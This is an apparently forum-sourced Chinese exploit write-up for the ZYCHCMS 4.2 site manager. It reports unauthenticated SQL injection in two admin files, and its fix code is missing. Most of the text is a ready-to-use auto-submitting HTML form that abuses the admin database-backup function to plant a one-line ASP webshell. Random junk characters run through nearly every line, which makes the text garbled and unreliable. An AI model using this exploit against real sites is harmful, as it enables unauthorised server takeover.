' x6 e* z5 ]5 h- V* y3 v+ u. i( H# v8 i* W3 Z
; z' R. u5 L r* r" @: M( n/ _3 ]0 A* G8 W
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀); z6 ?' p+ a4 x4 @; e
①SQL注射漏洞
6 t7 k& A' d* k+ M 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
; v2 W2 \3 ?1 I 漏洞原因:未过滤5 a2 u# n% w j0 Q- a4 S
漏洞代码:; x/ I, v8 Y! ]; K( U$ k$ t
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
/ W7 m* X4 l9 t5 E$ ^ 修复方法:在文件开头加入代码
0 {: b% P! F/ W% J" ?$ q$ p9 p
/ K$ B H( \1 l8 I2 _ n) R7 x+ C5 _* b Y- w; E. \
②后台拿WBSHELL
7 V; k! n A' Z" N M- f9 ]: M0 I 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。) h* C4 T, @$ s4 t# \% p; D$ N4 g
这里在网上找了一个,改了下,将就着用。
3 U: E! t% x) R0 Y 以下是代码本地提交代码" u4 H8 M6 s9 E q Y9 p2 A' v
6 n0 \5 W0 o& ]. F' Q
. N( {. V, {3 H; }3 W<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add> @+ _7 h7 m7 ]) a2 R
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
% C- q0 Y/ | N' M7 M3 x4 t( y <tr>
% p% ?: o) |2 X& w/ o <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>+ e/ ~1 r3 W% z& q: I( y
</tr>
) v9 L8 _$ ^% u& x <tr># S) ~- J/ h3 |# v% Y
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
2 n- t0 p/ s: A$ o( V3 m </span>
4 n% F6 \8 r q, q <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >/ S \: A# x' D1 O9 _% k2 E
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >& k; j D, r/ P2 L2 H" q
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
. O7 g# t* n5 X# k# ? <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d- n9 b* r, \ i7 @3 A& t, {
<div align=”left”>
" F. a0 G* E+ z; s <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />7 K& H6 n2 ^* y1 _
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>$ Q7 V2 ?* E9 J+ r! U* d
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />: N; b) Z* f) v' P& S
</div></td>
6 J4 q+ F+ u/ Z1 i. s; a$ L+ V </tr>$ x7 e5 K- W) @' C( P: `
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
8 }- x3 q0 n8 I- D; c6 k <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
% f" ^4 r/ }, L0 _' C5 s5 O0 a; M- f <td class=”td”><div align=”left”>
* z; T" B+ V+ t0 h <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
( r1 d4 L8 z: k) G1 Q [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>1 O) t5 W( P. G) h1 l
</tr>0 E; P6 t. U$ i. ?: t3 M
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>6 k/ U. }& w' d) x. A6 M& w* ]
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
/ r: L* p) b5 ^( U7 c4 d <td class=”td”><div align=”left”>
1 T) P: ~% |3 _5 O <input type=”submit” value=”确定备份” class=”btn”4 t1 L6 S8 z! l! ^0 T: v3 l- Y
</div></td>
$ v2 Q1 r0 ?3 k6 ?6 x v7 M </tr>
5 s3 B& ^9 o, G </table></td></tr></form>
o: G1 K- j' ^: _: E </table>
6 f& e% @+ Y1 P9 H# G2 | </td>
4 j- x2 n1 @. m( p6 j1 ^1 x </tr>
& ^: Z4 H7 C, M/ j' V9 d </table>) N& } {3 r# O( m, m. I' z. Y
<script>6 W1 _8 P" n3 t% D P
document.all.add.submit();4 {0 ^& l/ W# ]4 M
</script>
6 L: w1 Y9 V" {6 K7 O
% _! B4 y0 E+ j2 ]' j
" }9 R. l& m/ v2 s- v
2 J" \/ ]2 C& R7 P, h# E+ k+ m
+ |9 y* i" F w8 R6 T: ~- Q. ~, A" O0 w i+ \* w* s( g
. v0 T; k% a& D) n, u
) A0 Q+ w3 ?- `, X+ _4 `
. M2 j% j- R5 C8 N: r) T7 e, k. C- K2 J! `9 @$ }; Q1 M N1 ?6 b7 b) }$ n
: ^7 C+ l5 Z* z- t9 H. z+ s
|